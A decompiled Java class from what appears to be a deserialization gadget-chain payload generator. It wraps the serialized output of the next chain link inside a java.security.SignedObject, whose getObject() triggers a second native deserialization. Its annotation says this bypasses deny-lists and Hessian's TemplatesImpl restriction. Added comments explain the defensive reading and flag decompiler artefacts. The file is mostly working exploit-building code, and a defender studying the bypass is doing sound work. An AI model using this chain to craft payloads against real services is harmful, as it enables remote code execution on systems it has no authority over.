package com.ar3h.chains.gadget.impl.javanative.jdk;

import com.ar3h.chains.common.ContextTag;
import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.util.CommonMethod;
import com.ar3h.chains.common.util.Reflections;
import flex.messaging.messages.AsyncMessageExt;
import java.security.KeyPairGenerator;
import java.security.PrivateKey;
import java.security.Signature;
import org.postgresql.jdbc.EscapedFunctions;

/**
 * Chain link that wraps the output of the next link in a {@link java.security.SignedObject}.
 *
 * <p>English rendering of the annotation text below: "SignedObject secondary deserialization.
 * The getObject() method triggers this chain and performs a second, Java-native
 * deserialization. The serialized data is carried as a byte stream, so it can get past some
 * blacklists. It also applies to Hessian deserialization, where it bridges to Java-native
 * deserialization and gets around the TemplatesImpl restriction in Hessian."
 *
 * <p>Defensive reading: {@code java.security.SignedObject#getObject()} deserializes its
 * {@code content} bytes through a new {@code ObjectInputStream} and does not check the
 * signature first. A class filter attached only to the outer stream, or a deny-list applied
 * by a non-native deserializer, therefore does not see the nested classes. Apply a
 * process-wide filter ({@code jdk.serialFilter} or
 * {@code ObjectInputFilter.Config.setSerialFilter}) and treat
 * {@code java.security.SignedObject} itself as a type to reject when the input is untrusted.
 *
 * <p>This class shares its simple name with the JDK type, so the JDK type is always written
 * fully qualified here.
 */
@GadgetAnnotation(name = "SignedObject二次反序列化", description = "getObject()方法触发本链，实现Java原生的二次反序列化\nJava序列化数据以字节流形式存放，所以能绕过一些黑名单\n以及适用于 Hessian 反序列化中，能够建立与Java原生反序列化的桥梁，能够绕过Hessian反序列化中 TemplatesImpl 的限制", dependencies = {"jdk:java.security.SignedObject"}, priority = 30)
@GadgetTags(tags = {Tag.SignedObjectChain, Tag.Getter}, nextTags = {Tag.JavaNativeDeserializePayload, Tag.CustomJavaDeserialize})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/javanative/jdk/SignedObject.class */
public class SignedObject implements Gadget {
    // Values that invoke() publishes into the GadgetContext: the property name and the
    // getter method name of the JDK SignedObject.
    String paramName = "object";
    String methodName = "getObject";

    /**
     * Builds a {@link java.security.SignedObject} whose {@code content} field holds the
     * result of {@code CommonMethod.handleSerialized(obj)}.
     *
     * @param obj the object produced by the rest of the chain
     * @return the populated {@code java.security.SignedObject}
     * @throws Exception if key generation, reflection, or signing fails
     */
    public Object getObject(Object obj) throws Exception {
        // NOTE(review): AsyncMessageExt.CLASS_ALIAS belongs to an unrelated library; this
        // looks like a decompiler artefact standing in for an identical string literal
        // (presumably "DSA") - confirm against the original source.
        KeyPairGenerator generator = KeyPairGenerator.getInstance(AsyncMessageExt.CLASS_ALIAS);
        generator.initialize(1024);
        java.security.KeyPair throwawayPair = generator.genKeyPair();
        PrivateKey signingKey = throwawayPair.getPrivate();
        Signature engine = Signature.getInstance(AsyncMessageExt.CLASS_ALIAS);

        // The constructor is given a placeholder value; the content field is then
        // overwritten by reflection with the serialized form of obj.
        java.security.SignedObject wrapper = new java.security.SignedObject(1, signingKey, engine);
        Reflections.setFieldValue(wrapper, "content", CommonMethod.handleSerialized(obj));

        // Re-run the signing method by reflection after the content was swapped.
        // NOTE(review): EscapedFunctions.SIGN is likewise a borrowed constant, presumably
        // the literal "sign" - confirm.
        Reflections.getMethod(wrapper, EscapedFunctions.SIGN, new Class[]{PrivateKey.class, Signature.class})
                .invoke(wrapper, signingKey, engine);
        return wrapper;
    }

    /**
     * Creates the next link's object, records this link's getter metadata in the context,
     * and returns the next object wrapped by {@link #getObject(Object)}.
     *
     * @param gadgetContext shared context; receives the parameter name, method name and
     *                      the JDK {@code SignedObject} class
     * @param gadgetChain   the chain whose {@code doCreate} yields the object to wrap
     * @return the wrapping {@code java.security.SignedObject}
     * @throws Exception propagated from the chain or from {@link #getObject(Object)}
     */
    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        // The downstream object is created first, before the context is written to.
        Object inner = gadgetChain.doCreate(gadgetContext);

        gadgetContext.put(ContextTag.GETTER_PARAM_NAME_KEY, paramName);
        gadgetContext.put(ContextTag.SPECIAL_METHOD_NAME_KEY, methodName);
        gadgetContext.put(ContextTag.SUPER_CLASS_NAME_KEY, java.security.SignedObject.class);

        return getObject(inner);
    }
}
